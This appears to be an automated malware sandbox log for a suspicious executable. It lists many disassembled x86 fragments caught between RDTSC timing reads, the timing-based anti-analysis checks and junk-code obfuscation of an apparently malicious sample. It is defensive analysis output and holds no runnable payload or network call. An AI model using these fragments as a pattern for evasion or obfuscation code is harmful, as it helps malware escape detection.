Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 99AF6E second address: 99AFC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 sbb dx, 75E1h 0x0000000d push 00000003h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F73F910AA58h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov ecx, 1D3D341Ch 0x0000002e push 00000000h 0x00000030 movzx edx, ax 0x00000033 push 00000003h 0x00000035 pushad 0x00000036 cmc 0x00000037 mov dword ptr [ebp+122D181Eh], edx 0x0000003d popad 0x0000003e mov edi, dword ptr [ebp+122D2B59h] 0x00000044 push 81EA80FAh 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c push edx 0x0000004d pop edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 99B0BE second address: 99B163 instructions: 0x00000000 rdtsc 0x00000002 je 00007F73F90B68F3h 0x00000008 jmp 00007F73F90B68EDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 call 00007F73F90B68EBh 0x00000015 call 00007F73F90B68F9h 0x0000001a jmp 00007F73F90B68F0h 0x0000001f pop ecx 0x00000020 pop esi 0x00000021 push 00000000h 0x00000023 movzx ecx, cx 0x00000026 jmp 00007F73F90B68F4h 0x0000002b call 00007F73F90B68E9h 0x00000030 jng 00007F73F90B68F4h 0x00000036 jmp 00007F73F90B68EEh 0x0000003b push eax 0x0000003c jmp 00007F73F90B68F7h 0x00000041 mov eax, dword ptr [esp+04h] 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 push edi 0x00000049 pop edi 0x0000004a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 99B163 second address: 99B167 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 99B167 second address: 99B170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 99B170 second address: 99B237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73F910AA5Bh 0x00000009 popad 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d jmp 00007F73F910AA69h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 js 00007F73F910AA68h 0x0000001c jnp 00007F73F910AA62h 0x00000022 pop eax 0x00000023 jg 00007F73F910AA5Ch 0x00000029 mov di, ax 0x0000002c push 00000003h 0x0000002e add dword ptr [ebp+122D18AAh], esi 0x00000034 push 00000000h 0x00000036 adc di, 8C51h 0x0000003b mov edi, dword ptr [ebp+122D2A65h] 0x00000041 push 00000003h 0x00000043 mov di, 0722h 0x00000047 push 96BCB75Eh 0x0000004c pushad 0x0000004d jl 00007F73F910AA5Ch 0x00000053 pushad 0x00000054 push esi 0x00000055 pop esi 0x00000056 jmp 00007F73F910AA69h 0x0000005b popad 0x0000005c popad 0x0000005d add dword ptr [esp], 294348A2h 0x00000064 xor dword ptr [ebp+122D38A9h], ebx 0x0000006a and ecx, 06355E9Bh 0x00000070 lea ebx, dword ptr [ebp+12451DDAh] 0x00000076 mov edi, dword ptr [ebp+122D2B45h] 0x0000007c xchg eax, ebx 0x0000007d push eax 0x0000007e pushad 0x0000007f push eax 0x00000080 push edx 0x00000081 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 99B237 second address: 99B23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 99B2EB second address: 99B35B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F73F910AA6Ah 0x00000008 jmp 00007F73F910AA64h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push ecx 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007F73F910AA5Eh 0x00000019 popad 0x0000001a pop ecx 0x0000001b nop 0x0000001c mov dx, bx 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ebp 0x00000024 call 00007F73F910AA58h 0x00000029 pop ebp 0x0000002a mov dword ptr [esp+04h], ebp 0x0000002e add dword ptr [esp+04h], 00000016h 0x00000036 inc ebp 0x00000037 push ebp 0x00000038 ret 0x00000039 pop ebp 0x0000003a ret 0x0000003b mov dword ptr [ebp+122D18AAh], ebx 0x00000041 adc edi, 54ED7D4Ch 0x00000047 call 00007F73F910AA59h 0x0000004c push eax 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 99B35B second address: 99B372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop esi 0x0000000e pop ecx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 99B372 second address: 99B37A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 99B37A second address: 99B397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jmp 00007F73F90B68F1h 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 99B397 second address: 99B3B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73F910AA66h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 99B3B1 second address: 99B3B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 99B3B5 second address: 99B3C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 99B3C5 second address: 99B40F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007F73F90B68E8h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e pop eax 0x0000000f jmp 00007F73F90B68F1h 0x00000014 push 00000003h 0x00000016 mov esi, dword ptr [ebp+122D2AD1h] 0x0000001c push 00000000h 0x0000001e adc di, 02ADh 0x00000023 push 00000003h 0x00000025 mov edx, dword ptr [ebp+122D2ACDh] 0x0000002b call 00007F73F90B68E9h 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 jng 00007F73F90B68E6h 0x00000039 pop eax 0x0000003a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 99B40F second address: 99B433 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F73F910AA63h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 99B433 second address: 99B48F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F73F90B68F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jns 00007F73F90B68EEh 0x00000014 mov eax, dword ptr [eax] 0x00000016 push ebx 0x00000017 jnl 00007F73F90B68ECh 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push esi 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F73F90B68F7h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9ABC88 second address: 9ABC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9ABC8E second address: 9ABC93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9ABC93 second address: 9ABCB2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F73F910AA63h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9ABCB2 second address: 9ABCBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F73F90B68E6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9ABCBD second address: 9ABCC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F73F910AA56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 97E0E5 second address: 97E0FE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F73F90B68E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jl 00007F73F90B68E6h 0x00000014 push edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9B9E92 second address: 9B9E96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9B9E96 second address: 9B9EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73F90B68F3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F73F90B68F0h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9B9EC3 second address: 9B9EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BA021 second address: 9BA025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BA025 second address: 9BA029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BA029 second address: 9BA052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F73F90B68F9h 0x0000000f jl 00007F73F90B68E6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BA052 second address: 9BA064 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F73F910AA56h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BA064 second address: 9BA068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BA068 second address: 9BA06E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BA06E second address: 9BA07E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jp 00007F73F90B68E6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BA6F2 second address: 9BA6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BA6F8 second address: 9BA6FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BADB7 second address: 9BADBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BAF19 second address: 9BAF2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73F90B68EFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9AFFA4 second address: 9AFFC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b jmp 00007F73F910AA5Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BB69D second address: 9BB6A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BB6A1 second address: 9BB6BA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F73F910AA56h 0x00000008 jmp 00007F73F910AA5Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BB6BA second address: 9BB6C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BB7F3 second address: 9BB7F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BB7F7 second address: 9BB818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F73F90B68F7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BB818 second address: 9BB83D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F73F910AA56h 0x00000010 jmp 00007F73F910AA65h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BB83D second address: 9BB841 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BB977 second address: 9BB994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73F910AA69h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BB994 second address: 9BB9B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68F9h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F73F90B68E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BBB35 second address: 9BBB68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F73F910AA5Dh 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 js 00007F73F910AA7Fh 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a jmp 00007F73F910AA61h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BBB68 second address: 9BBB6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BBB6C second address: 9BBB72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BF6E7 second address: 9BF6EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9BF6EE second address: 9BF757 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F73F910AA5Ch 0x00000008 jl 00007F73F910AA56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jno 00007F73F910AA5Ah 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jmp 00007F73F910AA69h 0x00000020 mov eax, dword ptr [eax] 0x00000022 jmp 00007F73F910AA61h 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F73F910AA68h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9C2323 second address: 9C2341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F73F90B68F9h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9C2341 second address: 9C2346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9C6F17 second address: 9C6F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9C6F1B second address: 9C6F36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F73F910AA6Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9C71DA second address: 9C71E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9C748E second address: 9C7492 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9C761B second address: 9C763A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73F90B68EFh 0x00000009 popad 0x0000000a jmp 00007F73F90B68EBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CC3A1 second address: 9CC3E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 68D9FCB0h 0x00000010 sub dword ptr [ebp+122D3407h], ebx 0x00000016 call 00007F73F910AA59h 0x0000001b jmp 00007F73F910AA66h 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CC3E3 second address: 9CC3FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73F90B68F2h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CC3FA second address: 9CC415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73F910AA67h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CC415 second address: 9CC42D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edi 0x0000000d push esi 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop esi 0x00000011 pop edi 0x00000012 mov eax, dword ptr [eax] 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CC79B second address: 9CC7A5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F73F910AA56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CC971 second address: 9CC98C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73F90B68F7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CCA42 second address: 9CCA50 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CCA50 second address: 9CCA54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CCA54 second address: 9CCA71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CD00C second address: 9CD018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnp 00007F73F90B68E6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CD12B second address: 9CD136 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CD227 second address: 9CD22B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CD673 second address: 9CD677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CDB0D second address: 9CDB12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CDB12 second address: 9CDB18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CDB18 second address: 9CDB1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CE523 second address: 9CE533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F73F910AA56h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D00BC second address: 9D00C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D00C0 second address: 9D00FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D2D4Fh], esi 0x0000000e xor esi, 485384E6h 0x00000014 push 00000000h 0x00000016 jmp 00007F73F910AA67h 0x0000001b jns 00007F73F910AA56h 0x00000021 push 00000000h 0x00000023 movsx esi, dx 0x00000026 push eax 0x00000027 pushad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D0A73 second address: 9D0A77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D0A77 second address: 9D0A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D0A7D second address: 9D0A83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D15C8 second address: 9D15CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
